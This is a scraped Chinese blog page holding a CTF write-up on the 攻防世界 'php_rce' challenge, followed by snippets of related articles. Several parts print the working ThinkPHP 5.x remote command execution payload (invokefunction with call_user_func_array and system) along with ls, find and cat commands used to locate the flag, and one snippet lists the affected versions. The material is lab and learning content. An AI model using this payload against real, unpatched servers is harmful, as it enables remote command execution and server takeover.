攻防世界 web进阶 php_rce 【远程命令执行 thinkphp5 rce漏洞】

最新推荐文章于 2025-03-17 17:48:47 发布

Hrain777

最新推荐文章于 2025-03-17 17:48:47 发布

阅读量984

点赞数 1

文章标签：前端 php 安全

本文链接：https://blog.youkuaiyun.com/Hrain7/article/details/121323987

版权

本文详细介绍了如何利用ThinkPHP5的远程命令执行漏洞（RCE）进行攻击，通过调整payload逐步遍历文件目录，最终找到并访问了包含flag的文件，展示了漏洞复现的过程。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

是远程命令执行 thinkphp5 rec漏洞

具体执行语句可参考大佬的博客

ThinkPHP 5.x远程命令执行漏洞分析与复现 - 渗透测试中心 - 博客园

其实就在网上搜一下thinkphp5 rec漏洞改一下payload 就行

首先试试列出当前目录

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Hrain777

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

【网络安全 | CTF】攻防世界 php_rce 解题详析

等风来

05-22

7813

PHP RCE 指的是通过远程代码执行漏洞（Remote Code Execution）来攻击 PHP 程序的一种方式。简单来说，由于PHP应用程序没有正确处理外部输入数据（如用户提交的表单、请求参数等），此时通过某些手段向 PHP 应用程序中注入恶意代码，然后通过这些恶意代码实现对受攻击服务器的控制。由上图可知，flag字段储存在flag文件夹下的flag文件中。使用thinkphp 5.1.payload进行尝试，根据提示，使用5.0.20版本的Payload。说明命令执行成功，接着抓取flag即可。

【攻防世界-Web进阶篇-007php_rce】

gyy990526的博客

03-14

2353

解：打开靶机提示了是ThinkPHP V5的远程代码执行漏洞，V5.0、V5.1均有此问题构造payload，查看目录 payload:/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls 用ls /flag和find / -name'flag'效果一样都可以找到flag文件 payload:/?s=index/think\app/

参与评论您还未登录，请先登录后发表或查看评论

ThinkPHP5.x rec 漏洞分析与复现

MercyLin的博客

09-27

7616

https://help.aliyun.com/noticelist/articleid/1000081331.html?spm=5176.2020520001.1004.7.2e874bd363uLuf 先贴个漏洞预警,这里做一些内容摘要: 漏洞描述由于ThinkPHP5框架对控制器名没有进行足够的安全检测，导致在没有开启强制路由的情况下，黑客构造特定的请求，可直接GetWebShell。...

攻防世界web高手进阶php_rce,CTF-攻防世界-web-php_rce(ThinkPHP远程代码执行)

weixin_39637924的博客

03-09

433

题目今天做CTF的时候，遇到下面这道题，看上去应该跟ThinkPHP版本5的相关漏洞。之前听过ThinkPHP有漏洞，具体情况不清楚。。。解题过程去vulhub上搜了下ThinkPHP，还真有，把docker容器打开看了下，页面一摸一样哈哈：这是一个远程代码执行漏洞，先学习vulhub复现这个漏洞的过程：输入：http://your-ip:8080/index.php?s=/Inde...

SRC日常捡洞之某集团任意文件读取&RCE漏洞，从零基础到精通，收藏这篇就够了！_用户nc系统 rec 漏洞

最新发布

喜欢Python编程的程序员柚柚呀

03-17

1171

一直觉得，若能找一静僻之地，静心，静悟，静静思考，时时看看美丽的苍穹，时而品品手中的香茗，时而挥洒手中的笔墨，时而让钢笔在纸上舞动，在配以安静的乐曲，静静的，静静的，想想白天，想想生活，想想每一个人，那就好了。各地疫情有点严重，这几天社区封控也被圈家里出不去，听说隔壁楼有阳性，第一次疫情离的这么近，其实内心一点也不慌，常态而已。接下来我们说一下任意文件读取和RCE漏洞，这两个漏洞都是关于用友NC的。

攻防世界-web-进阶-php_rce

weixin_31610083的博客

11-10

3250

【题目描述】无【附件】无【过程及思路】打开在线场景。是一个关于ThinkPHP的页面，看起来没什么特别的，几个链接点进去也都是正常的官方链接。我们尝试到github搜索ThinkPHP V5，发现有相关的“远程代码执行”漏洞集合。 RCE（远程代码执行漏洞）用户通过浏览器提交执行命令，由于服务器端没有针对执行函数做过滤，导致在没有指定绝对路径的情况下就执行命令，可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。...

thinkphp5 rce

weixin_51558394的博客

08-17

515

thinkphp5 rce

xctf中php_rec的writeup,第十届全国大学生信息安全竞赛writeup

weixin_32589877的博客

03-13

1426

1.PHP execise 类型：WEB 分值：150分直接就能执行代码，先执行phpinfo(),发现禁用了如下函数assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl...

攻防世界_php_rce（ThinkPHP框架）

2401_87524087的博客

02-02

1012

常见攻击方式 Web应用漏洞利用：如PHP应用中，若对用户输入过滤不严格，攻击者可通过表单、URL参数等注入恶意命令，借助服务器执行命令的函数，像 system() 、 exec() 等实现远程命令执行。RCE指攻击者能通过网络远程控制目标系统，执行恶意命令，获取敏感信息、控制设备、传播恶意软件等，对系统安全和数据造成极大威胁。RCE（Remote Command Execution）远程命令执行，是一种严重的网络安全漏洞。点链接，发现是广告，没什么特别的，再看题目php.rce，查一下RCE是什么。

【攻防世界CTF|web方向】第六题：php_rce

weixin_70825534的博客

08-06

1135

该漏洞是由于ThinkPHP5在处理控制器传参时，没有对参数进行充分的过滤与验证，导致恶意用户可以通过提交恶意数据，构造出一个带有PHP函数的控制器方法，并通过URL参数的形式访问该方法，从而触发远程代码执行漏洞。2.本题学习目标：掌握框架漏洞，知道某个网页使用的框架版本，就可以去百度该版本的漏洞，网上一抓一大把，从而就能够利用该漏洞获得想要的信息。发现题目场景中的thinkPHP版本是v5.0.20，而我们找的这个漏洞是未知版本的，可能不属于当前网页版本的漏洞，所以页面错误！有跟flag相关的东西。

ThinkPHP5.x rec漏洞

这里是一处长期不更新的博客

09-23

510

漏洞详情由于ThinkPHP5框架对控制器名没有进行足够的安全检测，导致在没有开启强制路由的情况下，黑客构造特定的请求，可直接GetWebShell。影响版本 ThinkPHP 5.0系列 < 5.0.23 ThinkPHP 5.1系列 < 5.1.31 漏洞利用 ?s=index/\think\App/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=[命令] .

ThinkPHP 5.0 远程代码执行漏洞分析

02-21

ThinkPHP 5.0 远程代码执行漏洞分析

vulhub靶场文件(不用积分)

05-18

我下的挺慢，估计其他人也有这个情况。使用Vulhub一键搭建漏洞测试靶场，下载日期2020/05/18。 kali下安装命令 apt-get install docker.io apt-get install docker-compose cd cd /vulhub/flask/ssti service docker start docker-compose up -d

攻防世界php_rce

weixin_59392781的博客

07-30

157

开始题目只说了rce 百度一下rec：可能是让我们利用漏洞去找旗帜看一下页面： php5确实有漏洞查百度：随便复制一个提示为5.0.20的：继续找5.0的漏洞找见一个发现能用：接下来就是疯狂ls加cat ls …/…/…里有flag，但不是flag.txt flag{thinkphp5_rce} ...

php recever,receiver.php

weixin_36317800的博客

04-04

123

/*** Created by PhpStorm.* User: LY* Date: 2017/5/8* Time: 下午7:17*/header('Access-Control-Allow-Origin:*');header('Access-Control-Allow-Headers:x-requested-with,content-type,If-Modified-Since');header...

thinkphp rce-log4j2-宏感染-安卓客户端渗透

09-21

1340

客户端渗透+漏洞复现+后续利用

XCTF WEB 高手进阶区 php_rce

qq_30076719的博客

11-04

332

这一题，看到rec，第一时间想到命令执行，打开链接，提示ThinkPHP V5 ,V5就是第五个版本啦，据百度所知，ThinkPHP是一款国内流行的开源PHP框架，2018年被爆出存在可能的远程代码执行漏洞，受影响的版本包括5.0和5.1版本，那么很合理啦，这一题考的就是这个漏洞的利用，百度可得poc s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=

Think PHP 5 RCE漏洞复现及排查

dayouzi的博客

08-11

2715

ThinkPHP是一款运用极广的PHP开发框架。其漏洞点是由于ThinkPHP框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞。

攻防世界-php_rce

weixin_49539962的博客

09-01

651

s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=命令。ls查看文件没什么东西，robots.txt和index.php有可能有，不过看了也没什么可疑的。一直往上级目录查看三次才找到flag。使用cat命令查看flag文件。thinkPHP.0有漏洞，本题就是利用漏洞查找。

攻防世界：php_rce

01-07

远程代码执行(RCE)漏洞允许攻击者在受影响的应用程序上运行任意命令。对于PHP环境中的RCE漏洞，通常涉及不安全的函数调用或配置错误，这些都可能被利用来注入并执行恶意脚本。 #### 利用场景分析当应用程序存在未...